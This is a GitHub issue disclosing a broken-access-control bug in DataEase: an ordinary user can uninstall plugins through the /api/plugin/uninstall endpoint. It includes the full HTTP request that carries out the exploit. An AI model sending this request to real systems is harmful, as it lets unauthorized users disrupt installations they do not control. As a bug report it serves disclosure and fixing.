Skip to content

[Bug]普通权限越权卸载插件 #2429

Closed
@Ryze-T

Description

DataEase 版本
最新版

运行方式(安装包运行 or 源码运行 ?)
安装包运行

浏览器版本
任意

Bug 描述
普通权限越权卸载插件

Bug 重现步骤(有截图更好)
普通用户无法对插件进行处理,但是通过调用接口可对插件进行卸载:

POST /api/plugin/uninstall/1 HTTP/1.1
Host: xxx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN
Accept-Encoding: gzip, deflate
Authorization: xxx
LINK-PWD-TOKEN: null
Connection: close
Content-Length: 0

Authorization为鉴权标准,低权限依然可以调用api/plugin/uninstall接口进行插件卸载:
image
包发送后显示成功:
image
管理员查看插件被卸载,漏洞利用成功:
image

Metadata

Labels

类型:bugSomething isn't working

Type

No type

Projects

No projects

Milestone

No milestone

Relationships

None yet

Development

No branches or pull requests

Issue actions